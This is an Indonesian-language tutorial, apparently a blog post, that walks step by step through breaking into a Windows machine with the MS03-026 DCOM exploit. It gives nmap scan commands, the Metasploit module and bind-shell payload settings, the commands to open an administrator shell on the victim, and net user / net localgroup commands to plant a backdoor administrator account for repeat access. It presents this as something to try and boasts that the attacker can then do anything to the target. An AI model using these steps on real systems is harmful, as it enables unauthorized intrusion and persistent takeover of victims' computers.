I.
Scanning IP Target
Untuk tahap ini saya menggunakan NMap untuk searching IP address dan Port
dari Target yang akan di eksploitasi. Untuk NMap dapat didownload dari alamat
http://nmap.org/download.html. Setelah
NMap diinstal. langkah yang dilakukan adalah sebagai berikut:
·
Buka Command Prompt (Run -> CMD).
·
Ketik nmap –sS –O à ex/: nmap –sS –O –P
192.168.56.2-255
è
Opsi –sS gunanya untuk TCP SYN scanning, jadi
scanning dilakukan dengan mengirimkan signal SYN kepada target, bila ada
balasan berarti target UP.Opsi ini biasanya digunakan pada target yg berada
pada subnet yg sama dg attacker.
è
Opsi –O untuk mengetahui Sistem Operasi yang
digunakan target
è
Untuk Opsi lain bisa dengan mengetikan nmap pada
command prompt.
·
Setelah selesai scan tandai IP yang akan
diattack, dan pastikan bahwa Port 135 milik Target terbuka, karena Exploit ini
akan menggunakan Port tersebut.
II. Launch Exploit
Setelah didapatkan IP dan Port milik Target, kita akan me-launch exploit
ke target sebagai pembuka Jalan untuk kita melakukan eksploitasi terhadap
System milik Target. Untuk melakukan Exploit dilakukan dengan cara sebagai
berikut:
·
Buka Console Metasploit.(Untuk yang menggunakan
metasploit GUI bisa melompati step ini)
·
Pada
Console Ketikkan ‘search exploits ms03_026_dcom’ untuk mencari exploit ms03_026_dcom.
·
Setelah itu Ketikkan ‘use exploit/windows/dcerpc/ms03_026_dcom’
·
Kemudian Ketikkan ‘show payloads’, maka akan
muncul payload yang dapat digunakan untuk exploitasi ke target. Payload yang
saya gunakan adalah ‘generic/shell_bind_tcp’, dimana payload ini akan membuka
sebuah console yang dapat mengakses Command Prompt milik target dengan akses
Admin sehingga dapat menembus System Windows (heheheheheh)
·
Setelah didapat, ketikkan ‘set payload
generic/shell_bind_tcp’ untuk menggunakan payload tersebut pada exploit ms03_026_dcom,
setelah sukses ketikkan ‘show options’, maka akan muncul variable yang harus
kita set. Variablenya adalah RHOST, dimanaa RHOST adalah IP dari target.Untuk
mengesetnya ketikkan ‘set RHOST ’, untuk mengeceknya ketikkan
‘show options’, jika RHOST sudah terisi berarti set RHOST sukses.
3. ANTI CLIMAX
III.
Exploiting Target
·
Setelah setting exploit Selesai, maka launch
exploit tersebut. Caranya, pada Console ketikkan “exploit”, maka metasploit
akan memproses tunnel ke Command Shell Target.
·
Setelah Proses Selesai, ketikkan “sessions –i
lalu enter , maka akan terbuka command shell dari Korban. Command Shell akan
mengacu ke folder System 32 dari OS Target. Nah, apabila hal ini telah
“terjadi” maka kita sudah dapat mengakses System Target Secara Penuh. Kita
dapat melakukan apa saja, mulai dari mengacak- acak system dari OS target,
mengubah Account admin target, dan lain sebagainya.
·
Misalkan saya akan menambahkan account
administrator ke target, sehingga saya tidak perlu melakukan tunneling lagi
bila saya akan mengakses OS target, Langkahnya adalah :
i.
Ketikkan : net user
/add
ii.
Kemudian jadikan user tersebut menjadi
administrator, ketikkan : net localgroup /add
iii.
Lalu cek dengan mengetikkan : net user , jika
ada maka proses pembuatan account berhasil, dengan itu, kita sudah bisa
menggunakan akun tersebut untuk akses OS target. :D
·
Setelah berhasil dicoba, maka cobalah untuk
menggakses dengan menggunakan user tersebut .